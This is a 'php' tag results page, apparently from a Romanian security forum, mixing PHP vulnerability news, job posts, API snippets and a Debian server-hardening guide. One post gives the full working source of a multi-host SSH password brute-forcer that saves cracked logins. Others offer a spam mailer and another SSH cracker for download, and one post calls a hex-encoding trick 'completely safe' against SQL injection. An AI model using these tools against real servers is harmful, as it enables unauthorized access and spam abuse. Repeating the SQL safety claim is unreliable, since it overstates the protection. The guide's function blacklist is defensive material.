Showing results for tags 'php'.

  1. Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases.

    “Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says.

    There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug.

    “There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.”

    Source
  2. I'm looking for someone who knows how to work with PHP, HTML or JavaScript. PM for details.
  3. PHP Script to send and receive messages on WhatsApp

    I have been reading many tutorials for sending and receiving WhatsApp messages via PHP, but there is not a single article which explains properly, with steps, how to retrieve your WhatsApp password, which is created and stored on the WhatsApp server when you create a WhatsApp account, which is the main challenge as of now in other articles. Thanks to this tool, which has made 50% of the work easy: https://github.com/shirioko/WART

    Okay, so we will quickly go through the steps for the WhatsApp Registration Tool:

      • Go to the link https://github.com/shirioko/WART
      • Download the whole project by clicking Clone to Desktop
      • Run the WART-1.7.3.0 exe file
      • Enter the phone number with country code (e.g. India number: 91xxxxxxxxxx). P.S. Do not put any special symbol like (+91) for India.
      • Click on Request Code and you will receive a code from WhatsApp on the entered mobile number.
      • Now verify that code in the 2nd step and that's it. You are here. Your password will appear. P.S. Do not share your password with anyone, because it can be used in a loop for any kind of messages.

    Okay, now we are done with 50% of the task. Now we need to write the PHP script which will send messages to a WhatsApp registered number. You will need 2 things for sending messages to WhatsApp through PHP:

      • Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE): 91xxxxxxxxxxx
      • Password (which you got from the WART.EXE tool)

    Alright Sparky, let's get this done…

        <?php
        require_once './src/whatsprot.class.php';
        $username = "919xxxxxxxxx"; // Mobile phone prefixed with country code, so for India it will be 91xxxxxxxx
        $password = "your password";
        $w = new WhatsProt($username, 0, "Mayank Grover Blog", true); // Name your application by replacing "WhatsApp Messaging"
        $w->connect();
        $w->loginWithPassword($password);
        $target = '91xxxxxxxxxxx'; // Target phone, receiver phone
        $message = 'Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account';
        $w->SendPresenceSubscription($target); // Let us first send presence to user
        $w->sendMessage($target,$message ); // Send message
        echo "Message Sent Successfully";
        ?>

    So everything is quite clear in the above script, i.e. you need to set your application details: username as mobile number, password which you got from the WART tool, target as your target mobile number, and lastly the message (plain text which you need to send).

    Okay, now I know many questions are coming to your mind.

    In the first line, require src/whatsprot.class.php, what is this? You need to download the WhatsApi from this link. There you will find the src directory with all the source files.

    Can we only send plain text messages, or media like images and videos? Yes, we can send media files also. So next I will be writing a PHP script to send a media file to any WhatsApp account.

    SOURCE
  4. This is a brief write up noting javascript backdoors left in common PHP shells. Read more: http://dl.packetstormsecurity.net/papers/general/backdoor.pdf
  5. Php and mysql can even say .. not taught. In general, need a simple script ... For example in column 1 has the words "home" and "school" ... In the 2nd column values ??5 ... If you enter the word "school" is coming out if "house" Total of these "words" will be very much and sometimes 1 word will show 20 extra. words (and maybe more). It is desirable to be able to add "extra word." Or * extra. * word to the "word" .. Add a "word" - you can not, though, I'll just add, and this is not very important ... P.S. google translate
  6. Due to lack of time, I will no longer take on desktop applications. I build small and medium-sized websites, scripts, pages, bug fixes, optimizations. I write clean, commented code. UPDATE: After seeing dozens of scripts/pages made by this person and that, I can say that my code is calligraphy! For complete websites I can also handle hosting and server configuration, so that the site is delivered "turnkey". I also offer maintenance where applicable. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Payment methods: PayPal or bank transfer Payment: on completion of the project or in installments, case by case. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  7. Inspired by Dan Kaminsky, I want to present an efficient, simple and safe method of protecting web applications against MySQL injection vulnerabilities. All you need is to use the following code fragment:

        array_walk_recursive($_GET, function (&$val, $key) {
            if (!is_numeric($val)) {
                $val = '0x' . bin2hex($val);
            }
        });

    After that, you can use any variable from the $_GET array without thinking about securing it. For example, the following SQL statement is completely safe, and it does not matter at all what data the $_GET['name'] variable contains:

        $sql = "SELECT * FROM users WHERE name={$_GET['name']}";

    Unlike Dan Kaminsky's method, in this case database performance will not suffer, and as far as PHP is concerned, the bin2hex() function is faster even than mysqli_escape_string(), so in terms of performance everything is wonderful. Still, depending on the application and its requirements, you will need to change the code fragment shown above accordingly. The most correct approach would be to create a new variable in which to keep the data you will use when building SQL queries. For example, we can create the following function:

        function hex_secure($vars) {
            array_walk_recursive($vars, function (&$val, $key) {
                if (!is_numeric($val)) {
                    $val = '0x' . bin2hex($val);
                }
            });
            return $vars;
        }

    and use it as follows:

        $vars = hex_secure($_GET);
        $sql = "SELECT * FROM users WHERE name={$vars['name']}";
  8. I saw @just-for-funn's thread and, wanting to help him, I decided to create a new thread in the hope that someone else will find it useful too. So, I want to write about a simple method of translating data using PHP and Microsoft's API. Each month, for a single account, you get 2 million characters for free (if you need more characters, you can pay or kindly ask the folks at the Illuminati to help you with money and accounts). First of all, we need to obtain the personal credentials for working with the API. To do this:

      • Activate "Microsoft Translator"
      • Copy the "Customer ID"
      • Generate the "Secret Key"

    Now that we have all the necessary data, we download the following PHP class http://test.securrity.com/BingTranslator/class.phps and save it to a local file class.php. Then we modify the $config variable by entering the data obtained and run the following code:

        require 'class.php';
        $bt = new BingTranslator();
        echo $bt->translate('en', 'ro', 'Hello RST');

    The result will be as simple as "Bună ziua RST".
  9. Hello everyone, As part of a recruitment session planned for April in Bucharest, the recruitment firm Cooptalis is looking, on behalf of one of its French clients (a major ICT company established in more than 40 countries), for experienced PHP developers who know object-oriented programming as well as French. The positions are based in northern France (Lille). If you would like more information about this opportunity, please contact me: raluca.sandu@cooptalis.com !
  10.     <?php
        function image_upload($image, $status){
            require ('tmhOAuth.php'); //https://github.com/themattharris/tmhOAuth
            $tmhOAuth = new tmhOAuth(array(
                'consumer_key' => "sfdgdsgsdfg",
                'consumer_secret' => "dsfgdsfgdsfgsd",
                'user_token' => "sdfsdfsdf",
                'user_secret' => "fgdgdfgdf",
            ));
            $code = $tmhOAuth->request(
                'POST','https://api.twitter.com/1.1/statuses/update_with_media.json',
                array(
                    'media[]' => "@{$image};type=image/jpeg;filename={$image}",
                    'status' => $status,
                ),
                true, // use auth
                true // multipart
            );
            return $code;
        }
        echo image_upload('/var/www/crawl/img/62845745.jpg','Postat prin API');
        ?>

    1. create an application in Twitter developer and add the tokens
    2. run the function image_upload('calea/absoluta/a/pozei','Postat prin API');
    3. you can pair it with the Facebook one
    4. add it to cron
  11. Versus71

    Regex101

    Regex101.com is a free of charge regex testing service where you can easily create expressions while you simultaneously have real time error detection, highlighting and explanation of your regex. Thanks to the permalink feature, it is a great reference which may even be used in code where you need to explain your regular expressions to co-workers. Link: regex101.com
  12. It seems that one of Google's latest praiseworthy deeds has been overlooked by the RST community, and that doesn't seem right to me. So, go in and marvel: App Engine supports PHP and is available to everyone who wants it! Yes, with some restrictions and still in beta, but it's not bad, especially since you can already install WordPress. One more clear proof that if Mohammed won't go to the mountain, the mountain comes to Mohammed.
  13. Hi, I'm looking for a person who is pretty good at PHP. If anyone is interested and has time for something like this, paid of course. PM with an ID: icq / yahoo / jabber. Thanks.
  14. SSH brute-forcer tool written in PHP. about: * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org usage: <?php/* .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * Usage : * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread> * Combolist : -c <combolist> -o <output> -t <thread> * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! 
*/ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n********************************* ************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 
'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread> */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread> */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { 
$this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n******************************************** *\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / janissaries.org group ?>
  15. [*] SSH_ Brute-force by MMxM Usage: ./ssh-crack.php <host> <user> <wordlist> Download: http://www.fileshare.ro/e29225522 Mirror: http://www.4shared.com/zip/F5gKTGjA/ssh-crack.html
  16. Hi, I know this is my first post on this forum, but I need your help. I'm a noob when it comes to Java or jQuery, but I need a function that hides divs. I found several functions on Google, but they require multiple unique ids, and I have to put this in a foreach function, so I can put 1 <div class="ex"> and then 5 divs will be generated dynamically.
  17. I'm offering 30 USD LR to a skilled person with the time/desire to work, to create a clone of a website (interface only) in PHP/HTML. The project can be completed in less than 2 hours. Time-wasters should abstain. Details in private.
  18. http://mytest-php.web44.net/ Follow the instructions ... I don't know what else to add to it. I hope you can help me with some suggestions. I would also like to refine the story. I await your opinion!
  19. Login X Please include the method/syntax as well. Explain a bit how it works. PS: I know I keep pestering you with this kind of stuff...
  20. http://mytest-php.web44.net/ I don't know how feasible SQLi is on this website. I want to learn more about PHP & SQL and I would be very grateful if you left a short explanation about: how vulnerable is it?; why?; what needs to be changed?;
  21. adonisslanic

    Lele

    Sql_err404
  22. The script for spam mailing server through sendmail. In the tests showed good results, especially when a large number of servers. Description: Random, intellectual generation fields Subscribe to the attach Plain and html format Download: http://madnet.name/files/download/2_madspamer.php
  23. PHP scripts to order / Sales As the title says, I make PHP scripts to order. ______________________________________________ Technologies: The script may contain JavaScript, HTML, PHP, CSS, MySQL. Contact: Send me a PM with the script you want and I will contact you. Payment: Orange top-up card / PayPal payment. ______________________________________________ For sale: Account -> Metin2.ro | level 45 | good items | server: volans | PM for details. PHP script -> regenerates all passwords in the db -> and sends an email to each user.
  24. Greenbytes

    html/css

    Hi, I'm wondering, besides HTML and CSS, what else is advisable to know in order to build something better? Browser scripting - JavaScript and jQuery / AJAX? Server scripting - PHP? Thanks, Greenbytes
  25. This tutorial is aimed at those who want to configure a server running Debian. In it I will cover the following:

    1. Installing a kernel with grsec.
    2. Installing and configuring Apache.
    3. Installing and configuring PHP.
    4. Installing PHP modules (extensions).
    5. Configuring Suhosin.
    6. Installing MySQL Server.
    7. Various permission changes for a better level of security
    8. Installing nginx and using it as a frontend for Apache (two-layer web server)

    ----------------

    1. Installing a kernel with grsec.

    If you don't yet know what grsec/grsecurity is, a good starting point is Grsecurity. For Linux, grsecurity is a kind of "holy grail" in terms of security. In addition, it rids you of a problem Linux has that irritates me: ps aux run as a user shows all processes.

        root@tex:~# echo "deb http://debian.cr0.org/repo/ kernel-security/" >> /etc/apt/sources.list
        root@tex:~# wget http://kernelsec.cr0.org/kernel-security.asc
        root@tex:~# apt-key add kernel-security.asc
        OK
        root@tex:~# apt-get update
        root@tex:~# apt-cache search grsec
        linux-source-2.6.32.15-1-grsec - Linux kernel source for version 2.6.32.15-1-grsec
        linux-source-2.6.25.10-1-grsec - Linux kernel source for version 2.6.25.10-1-grsec
        linux-image-2.6.32.15-1-grsec - Linux kernel binary image for version 2.6.32.15-1-grsec
        linux-headers-2.6.32.15-1-grsec - Header files related to Linux kernel, specifically,
        linux-source-2.6.27.29-4-grsec - Linux kernel source for version 2.6.27.29-4-grsec
        root@tex:~# apt-get install linux-image-2.6.32.15-1-grsec linux-headers-2.6.32.15-1-grsec
        root@tex:~# init 6 # here we reboot to boot the new kernel.
        // After reboot
        root@tex:~# uname -a
        Linux tex 2.6.32.15-1-grsec #2 SMP Mon Jun 28 09:05:30 CEST 2010 x86_64 GNU/Linux
        root@tex:~# su - tex
        tex@tex:~$ ps aux
        USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        tex 2103 0.6 0.1 36908 1276 pts/0 S 00:58 0:00 su - tex
        tex 2104 13.0 0.6 23380 6200 pts/0 S 00:58 0:00 -su
        tex 2129 0.0 0.1 16332 1176 pts/0 R+ 00:58 0:00 ps aux

    As you can see, as a user I only see my own processes.

    2. Installing and configuring Apache.

        root@tex:~# apt-get install apache2-mpm-prefork apache2.2-common apache2.2-bin
        root@tex:~# rm /etc/apache2/sites-available/default
        root@tex:~# cat >> /etc/apache2/sites-available/default << EOF
        > NameVirtualHost *
        >
        > <Directory "/var/www">
        > AllowOverride AuthConfig FileInfo Options Indexes Limit
        > Options FollowSymLinks
        > Options -Indexes
        > </Directory>
        >
        > <VirtualHost *>
        > DocumentRoot /var/www
        > ServerName 10.0.0.220
        > CustomLog /var/log/apache2/access_log combined
        > ErrorLog /var/log/apache2/error_log
        > </VirtualHost>
        > EOF
        root@tex:~#

    We will have Apache listen on 127.0.0.1 port 81, and it will be the backend.

        root@tex:~# echo "Listen 127.0.0.1:81" > /etc/apache2/ports.conf
        root@tex:~# /etc/init.d/apache2 start

    3. Installing and configuring PHP (plus libapache2-mod-php5, required for Apache (mod php))

    I will install PHP from dotdeb.

        root@tex:~# echo "deb http://packages.dotdeb.org stable all" >> /etc/apt/sources.list
        root@tex:~# echo "deb-src http://packages.dotdeb.org stable all" >> /etc/apt/sources.list
        root@tex:~# wget http://www.dotdeb.org/dotdeb.gpg
        root@tex:~# cat dotdeb.gpg |apt-key add - && rm dotdeb.gpg
        OK
        root@tex:~# apt-get update
        root@tex:~# apt-get install php5 php5-cli libapache2-mod-php5 php5-common php5-suhosin

    I replace "expose_php = On" with "expose_php = Off", "short_open_tag = Off" with "short_open_tag = On" and "session.name = PHPSESSID" with "session.name = SERVLET" in php.ini for apache2.

        root@tex:~# perl -pi -e 's/expose_php = On/expose_php = Off/' /etc/php5/apache2/php.ini
        root@tex:~# perl -pi -e 's/short_open_tag = Off/short_open_tag = On/' /etc/php5/apache2/php.ini
        root@tex:~# perl -pi -e 's/PHPSESSID/SERVLET/' /etc/php5/apache2/php.ini

    4. Installing and configuring PHP modules (extensions).

    I will install the following PHP extensions: curl, gd, mcrypt, mysql.

        root@tex:~# apt-get install php5-curl php5-gd php5-mcrypt php5-mysql

    5. Configuring Suhosin.

    For security reasons, I will blacklist the following functions using Suhosin: exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown

        root@tex:~# cat >> /etc/php5/conf.d/suhosin.ini << EOF
        >
        > suhosin.executor.func.blacklist = "exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown"
        > suhosin.cookie.max_array_depth = 256
        > suhosin.cookie.max_array_index_length = 256
        > suhosin.cookie.max_name_length = 256
        > suhosin.cookie.max_totalname_length = 512
        > suhosin.cookie.max_value_length = 20000
        > suhosin.cookie.max_vars = 200
        > suhosin.get.max_array_depth = 200
        > suhosin.get.max_totalname_length = 1024
        > suhosin.get.max_value_length = 1024
        > suhosin.get.max_vars = 1024
        >
        >
        > suhosin.post.max_array_depth = 1024
        > suhosin.post.max_array_index_length = 1024
        > suhosin.post.max_name_length = 1024
        > suhosin.post.max_totalname_length = 1024
        > suhosin.post.max_value_length = 95000
        > suhosin.post.max_vars = 1024
        >
        > suhosin.request.max_vars = 512
        > suhosin.request.max_value_length = 90000
        > suhosin.request.max_totalname_length = 1024
        > suhosin.upload.max_uploads = 400
        >
        > suhosin.executor.include.max_traversal = 2
        >
        > EOF
        root@tex:~#

    This is roughly what PHP looks like in the CLI:

        root@tex:~# php -v
        PHP 5.3.8-1~dotdeb.2 with Suhosin-Patch (cli) (built: Aug 25 2011 13:30:46)
        Copyright (c) 1997-2011 The PHP Group
        Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
            with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
        root@tex:~#

    6. Installing MySQL Server and MySQL Client

        root@tex:~# apt-get install mysql-client-5.5 mysql-server-5.5

    7. Various permission changes for a better level of security

    We mount tmpfs on /tmp with the flags "noexec,nosuid,nodev" for security reasons.

        root@tex:~# echo "tmpfs /tmp tmpfs noexec,nosuid,nodev 2 2" >> /etc/fstab
        root@tex:~# mount /tmp
        root@tex:~# mount |grep "/tmp"
        tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev)

    We delete "/var/tmp" and make it a symlink to tmp.

        root@tex:~# rm -rf /var/tmp/ && ln -s /tmp /var/tmp

    We chmod "/dev/shm" to 640 for security reasons.

        root@tex:~# chmod 640 /dev/shm

    8. Installing nginx and using it as a frontend for Apache (two-layer web server)

    We will listen on port 80 with nginx and use it as a frontend for Apache, which listens on 127.0.0.1 port 81 (reverse proxy).

        root@tex:~# apt-get install nginx
        root@tex:~# rm /etc/nginx/sites-enabled/default
        root@tex:~# pico /etc/nginx/sites-enabled/default

        # configuration file
        server {
            listen 0.0.0.0:80 default;
            server_name _;
            access_log off;
            error_log /dev/null;
            location / {
                proxy_pass http://127.0.0.1:81;
                proxy_redirect off;
                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            }
        }

    We start nginx.

        root@tex:~# /etc/init.d/nginx start
        Starting nginx: nginx.
        root@tex:~#

    I will put a phpinfo in "/var/www/" (http://i42.tinypic.com/121zmtx.png) to check that everything is in order, and I will delete index.html (default).

        root@tex:~# echo "<?php phpinfo(); ?>" >> /var/www/index.php
        root@tex:~# rm /var/www/index.html
        // restart Apache.
        root@tex:~# /etc/init.d/apache2 restart

    ---------

    Notes:
    - If you have questions about this tutorial, I will gladly answer them.
    - I apologize for any mistakes in wording (I have been skimping on sleep)
    - I did not specify a source for this tutorial because I wrote it myself.